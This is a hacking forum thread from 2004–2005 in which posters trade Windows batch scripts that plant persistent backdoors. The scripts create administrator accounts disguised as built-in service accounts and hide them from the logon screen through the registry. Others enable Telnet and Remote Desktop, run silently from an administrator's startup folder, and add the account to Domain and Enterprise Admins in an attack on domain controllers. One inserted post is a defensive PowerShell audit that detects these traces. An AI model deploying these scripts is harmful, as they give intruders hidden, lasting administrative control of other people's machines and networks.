Full Version: Create Admin User In Nt/2000/xp/2003
hercules @ Nov 16 2004, 10:36 PM:
Here is a Cool Script that will Create an Admin User in the Local System with CMD Commands.
User.cmd
If you Have any Suggestion to make it better, Post Here Your Ideas.

QUOTE(hercules @ Nov 16 2004, 10:36 PM)
Here is a Cool Script that will Create an Admin User in the Local System with CMD Commands. User.cmd If you Have any Suggestion to make it better, Post Here Your Ideas.

A suggestion - make it so that it pops up a question to ask the user what the password is. Of course, since you say it's open source, why not just say "You can create your own such file by typing this stuff into Notepad and then saving it as blat.cmd (or blat.bat for that matter)". If people want to know what it's doing, use "net help user" in any cmd window.

CODE
@echo off
net user IUSR_WAN /add /expires:never
net localgroup administrators /add IUSR_REMOTE
net user IUSR_WAN herman
net user IUSR_WAN /comment:"Built-in account for Remote Service"
net user IUSR_WAN /fullname:"Remote Service Account"

As for comments, that password is very insecure and should never be used on an internet-connected system.
Thanks for the typo, Link Updated.
We are working to make it into a tool.
About:
=======
User-CMD Tools is a simple program that uses NET USER commands to add, delete or modify an Administrator user account on Windows NT/2K/XP/2003.

From Net Help:
"NET USER creates and modifies user accounts on computers. When used without switches, it lists the user accounts for the computer. The user account information is stored in the user accounts database."

Options are as follows:

Option                    Description
-----------------------------------------------------------------------
username                  Is the name of the user account to add, delete, modify, or view. The name of the user account can have as many as 20 characters.
password                  Assigns or changes a password for the user's account. A password must satisfy the minimum length set with the /MINPWLEN option of the NET ACCOUNTS command. It can have as many as 14 characters.
/ADD                      Adds a user account to the user accounts database.
/DELETE                   Removes a user account from the user accounts database.
/FULLNAME:"name"          Is a user's full name (rather than a username). Enclose the name in quotation marks.
/COMMENT:"text"           Provides a descriptive comment about the user's account. Enclose the text in quotation marks.
/EXPIRES:{date | NEVER}   Causes the account to expire if date is set. NEVER sets no time limit on the account. An expiration date is in the form mm/dd/yy(yy). Months can be a number, spelled out, or abbreviated with three letters. Year can be two or four numbers. Use slashes (/) (no spaces) to separate parts of the date.
-----------------------------------------------------------------------

Freeman.
Note: The Tools will be Open Source!
/Edit: www.HermanGroup.org
Better code for XP; this will create the account and make it not visible on the login screen.

CODE
@echo off
net user illwill password /add && net localgroup administrators illwill /add
echo Windows Registry Editor Version 5.00> c:\hide.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg
echo "illwill"=dword:00000000>> c:\hide.reg
REGEDIT /S c:\hide.REG
DEL /Q c:\hide.REG
Exit

Or, if in a shell prompt, one simple copy-paste:

CODE
net user illwill password /add && net localgroup administrators illwill /add && echo Windows Registry Editor Version 5.00> c:\hide.reg && echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg && echo "illwill"=dword:00000000>> c:\hide.reg && REGEDIT /S c:\hide.REG && DEL /Q c:\hide.REG

Of course you can also modify this to look like some Microsoft-added user account too:

CODE
@echo off
net user UserName /add /expires:never * /comment:"User Name Account" /fullname:"User Name"
net localgroup administrators /add UserName

Will add it, NOT HIDE IT, and prompt for password.
Thanks ...
Next, a net share example!
Why not just:

CODE
net user IUSR_REMOTE herman /add /expires:never /comment:"Built-in account for Remote Service" /fullname:"Remote Service Account" && net localgroup administrators IUSR_REMOTE /add

QUOTE(illwill @ Nov 17 2004, 02:24 AM)
better code for xp this will create the account and make it not visible on the login screen

Yeah, I made a simple batch file that can do the same. Bit of a GUI batch I did for making some accounts on my home network for sharing; didn't want the account to show on the login screen.

CODE
@ECHO off
TITLE XP Acount creator ( FiNaLBeTa @ NFE )
COLOR 0f
set AC_PART=001
:HEADER
echo.
ECHO [INFO]
ECHO [-] Create a hidden user acount (U:%AC_NAME%; P:%AC_PASS%; G:%AC_GROUP%; H:%AC_HIDE% )
echo \
GOTO %AC_PART%
:001
SET /P AC_NAME= [*] Acount name? :
cls
SET AC_PART=002
GOTO HEADER
:002
SET /P AC_PASS= [*] Acount password? :
cls
SET AC_PART=003
GOTO HEADER
:003
SET /P AC_COMMENT= [*] Acount Comment? :
cls
SET AC_PART=004
GOTO HEADER
:004
ECHO [* The following groups are available on the machine.
ECHO.
net localgroup | find "*"
ECHO.
SET /P AC_GROUP= [*] Group? :
cls
SET AC_PART=005
GOTO HEADER
:005
SET /P AC_OK= [*] Creating acount now, Continue? (y/n) :
IF NOT %AC_OK%==y GOTO 0051
net user %AC_NAME% %AC_PASS% /add /COMMENT:"%AC_COMMENT%"
net localgroup "%AC_GROUP%" %AC_NAME% /add
ECHO.
pause
:0051
cls
SET AC_PART=006
GOTO HEADER
:006
SET /P AC_HIDE= [*] Do you want to hide the acount from the XP logon screen? (y/n) :
IF NOT %AC_HIDE%==y GOTO END
echo Windows Registry Editor Version 5.00>%TEMP%\addregistry.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>%TEMP%\addregistry.reg
echo "%AC_NAME%"=dword:00000000>>%TEMP%\addregistry.reg
Regedit /s %TEMP%\addregistry.reg
Del %TEMP%\addregistry.reg
:END
ECHO.
pause
FiNaLBeTa, your batch looks nice.

You can't do that when you don't have admin access already...

QUOTE
You can't do that when you don't have admin access already...

CMD commands always work only when you have admin access.

FiNaLBeTa, your code looks very nice.

Yes, many interesting scripts, many thanks for that; I have learned some funny commands.

Hi m8's

Thanks for the HIDE TIP @ illwill. And also a lot of thanks for the batch file from FiNaLBeTa. Looks nice and I could learn something from it. Thanks.
Just combine it with a script that enables Telnet or Remote Desktop and you have a perfect backdoor with just a batch file.

Telnet

CODE
@echo off
rem Enable Telnet as Backdoor on 2k
@echo REGEDIT4>temp.reg
echo. >>temp.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr]>>temp.reg
echo. >>temp.reg
echo "ErrorControl"=dword:00000001>>temp.reg
echo "Start"=dword:00000002>>temp.reg
echo "Type"=dword:00000010>>temp.reg
echo "FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,38,65,11,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00>>temp.reg
echo. >>temp.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>>temp.reg
echo. >>temp.reg
echo "NTLM"=dword:00000001>>temp.reg
echo "TelnetPort"=dword:0000ffff>>temp.reg
echo.
regedit /s temp.reg
echo Starting Service
net start tlntsvr
echo cleanup
del temp.reg
del install.cmd
exit

RemoteDesktop

CODE
rem enable RemoteDesktop on Win XP
echo Windows Registry Editor Version 5.00> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg
echo "fDenyTSConnections"=dword:00000000>> c:\TS.reg
echo "fAllowToGetHelp"=dword:00000000>> c:\TS.reg
regedit /s c:\TS.reg
del c:\TS.reg

Terminal Service

CODE
REM Auto Terminal Service enabler (works on XP/2000/2003)
@echo off
echo Windows Registry Editor Version 5.00> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>> c:\TS.reg
echo "Start"=dword:00000002>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg
echo "AllowTSConnections"=dword:00000001>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg
echo "fDenyTSConnections"=dword:00000000>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>> c:\TS.reg
echo "fAllowToGetHelp"=dword:00000001>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> c:\TS.reg
echo "AllowMultipleTSSessions"=dword:00000001>> c:\TS.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> c:\TS.reg
echo "AutoAdminLogon"="1">> c:\TS.reg
@echo --[ Registering the service... ]
echo.
REGEDIT /S C:\TS.REG
REGEDIT -S C:\TS.REG
echo [Components] > c:\bootlog~.txt
echo TSEnabled = on >> c:\bootlog~.txt
sysocmgr /i:%windir%\inf\sysoc.inf /u:c:\bootlog~.txt /q
DEL /Q c:\TS.REG
DEL /Q c:\bootlog~.txt
echo.
exit

Hope it's useful.
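An added audit script, not code from this thread or from User-CMD Tools, that checks a host for the traces the scripts above leave behind: UserList values that hide an account from the logon screen (illwill's hide.reg and FiNaLBeTa's batch), members of the local Administrators group that are not on a known baseline, and the Terminal Server, TlntSvr and AutoAdminLogon registry values the Telnet and Terminal Service scripts flip. It assumes Windows PowerShell 5.1 or later on Windows 10 / Server 2016 or later (for Get-LocalGroupMember), run as a local administrator; $ExpectedAdmins is a placeholder baseline to fill in.

```powershell
# Added audit example, not code from this thread or from User-CMD Tools.
# Assumes Windows PowerShell 5.1+ on Windows 10 / Server 2016+ (Get-LocalGroupMember),
# run as a local administrator. $ExpectedAdmins is a placeholder baseline to fill in.

function Get-AccountBackdoorFindings {
    param([string[]] $ExpectedAdmins = @('Administrator'))   # placeholder baseline
    $findings = New-Object 'System.Collections.Generic.List[string]'

    # Read one registry value; $null when the key or the value does not exist
    function Read-RegValue([string] $Key, [string] $Name) {
        if (-not (Test-Path $Key)) { return $null }
        (Get-ItemProperty -Path $Key -Name $Name -ErrorAction SilentlyContinue).$Name
    }

    # 1. Accounts hidden from the logon screen: UserList values set to 0 (what hide.reg writes)
    $userList = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
    if (Test-Path $userList) {
        foreach ($valueName in (Get-Item $userList).Property) {
            if ((Read-RegValue $userList $valueName) -eq 0) {
                $findings.Add("Account '$valueName' is hidden from the logon screen (UserList = 0)")
            }
        }
    }

    # 2. Local Administrators members that are not on the expected baseline
    foreach ($member in Get-LocalGroupMember -Group 'Administrators') {
        $shortName = $member.Name.Split('\')[-1]       # drop the MACHINE\ or DOMAIN\ prefix
        if ($ExpectedAdmins -notcontains $shortName) {
            $findings.Add("Unexpected Administrators member: $($member.Name) [$($member.PrincipalSource)]")
        }
    }

    # 3. Remote-access and logon values the Telnet / Terminal Server scripts flip
    $ts = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    if ((Read-RegValue $ts 'fDenyTSConnections') -eq 0) {
        $findings.Add('Remote Desktop is enabled (fDenyTSConnections = 0)')
    }
    if ((Read-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Services\TlntSvr' 'Start') -eq 2) {
        $findings.Add('Telnet server (TlntSvr) is set to start automatically (Start = 2)')
    }
    $winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    if ((Read-RegValue $winlogon 'AutoAdminLogon') -eq '1') {
        $findings.Add('AutoAdminLogon = 1: the console logs on without a password prompt')
    }
    return $findings
}

# Print one warning per finding; an empty result means none of the traces were found
Get-AccountBackdoorFindings | ForEach-Object { Write-Warning $_ }
```

Compare the Administrators findings against the account baseline you expect on that host; a UserList entry for a member of Administrators is the exact pattern the hide scripts above produce.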
Well, this can be useful if you don't have NTFS on a machine: put this in the admin's startup dir, and whenever he logs in next you get an admin account too. But what about the big black box he sees at startup? Maybe make a VB prog with something like

CODE
shell "temp.bat", vbHidden

And also add some code to delete both files after this is done. Is there a better way to hide the DOS window?
Thanks for the batch file Rasraven.
Terminal Service & Remote Desktop work exactly, but the Telnet service activates when the system is restarted on Windows XP.

rasraven: Your scripts seem to be cool but don't seem to work ...

Telnet: "FailureActions"=hex '#58' is not recognised as a command ... (something like that), 'a' is not recognised ...
RemoteDesk & TermServ: The batch processing is OK, but they don't seem to be activated ... and I presume there is no space in
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\TermService]>> c:\TS.reg
and in the other commands.
Nice work on the batch files guys, learning a lot from this.

Very interesting post.

Thanks to you all.

I should say any .cmd/.bat is always open source. Anyway, thanks!

Thanks for the bat files.

Good work...

Yeah, very very interesting.

I've learned some very cool commands. Thanks to all for sharing your knowledge.
Yeah, you may not be able to do it if you have admin rights, but you can make a schedule to execute the batch file using the at command under Windows XP; then the system will call the script and will do anything you like. This is why Task Scheduler is so dangerous in Windows: when it calls the task it runs whatever it is with SYSTEM privileges, not those of the user that created the task. In theory, of course.

This is indeed a very handy topic ..... didn't know all of it ... learnt some nice stuff here ..... thanks a bundle.
CODE
NET_API_STATUS NetUserAdd(
  LMSTR   servername,
  DWORD   level,
  LPBYTE  buf,
  LPDWORD parm_err
);

'nuff said.
Dunno why this is all necessary...
Just use pwdump4 to get the hashes and then crack the hashes... and bam, you've got the admin pass, so I don't know any reason why you should add your own user account. grtz

User-CMD Tools is a simple program that uses NET USER commands to add, delete or modify an Administrator user account on Windows NT/2K/XP/2003. Everyone can download this from the Herman Group site.

Very interesting, thanks a lot to everybody.

Does the task schedule even work if I'm at the login screen and haven't logged in yet? Sorry, I don't know much about this.
QUOTE(rasraven @ Dec 22 2004, 12:16 PM)
Just combine it with a script that enables Telnet or Remote Desktop and you have a perfect backdoor with just a batch file. Telnet [...] RemoteDesktop [...] Terminal Service [...] Hope it's useful.

That Terminal Server part probably won't work without the CD, unless you already have the file in place.

QUOTE(DumpZ @ Mar 22 2005, 01:24 PM)
That Terminal Server part probably won't work without the CD, unless you already have the file in place.

It works without asking for the CD. I have tried it on a few default XP Professional machines and 3389 opens and I'm able to connect to them.
Ok guys.. I released the Delphi source code for it that makes an executable file and compresses it well.
www.hermangroup.org Free User.CMD
I think it helps you all to make your own tools and is a good tutorial. Please continue to publish your codes here. Thanks. Freeman.
More Info: http://www.hermangroup.org/user-cmd.html
In the attack against domain controllers, you can create the batch file USER2.CMD with the following contents:

CODE
@echo off
NET USER "IUSR_WAN" "password" /ADD /ACTIVE:YES /EXPIRES:NEVER
NET LOCALGROUP "Administrators" "IUSR_WAN" /ADD
NET GROUP "Domain Admins" "IUSR_WAN" /ADD
NET GROUP "Enterprise Admins" "IUSR_WAN" /ADD
NET GROUP "Schema Admins" "IUSR_WAN" /ADD
NET GROUP "Group Policy Creator Owners" "IUSR_WAN" /ADD
NET USER IUSR_WAN /comment:"Built-in account for Remote Service"
NET USER IUSR_WAN /fullname:"Remote Service Account"

Note: In this scenario, in the attack against domain controllers, the domain under attack is the forest root domain.
Well, one thing to say: none of this will work if you do not already have admin rights.
Let's say you are trying to gain admin locally; it will not work if you don't already have it. But if you already have it, why not just go add yourself....
You guys are missing one thing. It doesn't work on local versions.